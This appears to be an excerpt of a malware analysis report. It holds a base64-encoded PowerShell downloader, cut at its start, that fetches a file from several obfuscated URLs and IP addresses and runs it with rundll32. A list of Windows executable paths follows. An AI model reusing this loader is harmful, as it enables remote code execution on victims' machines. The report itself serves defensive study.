CkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |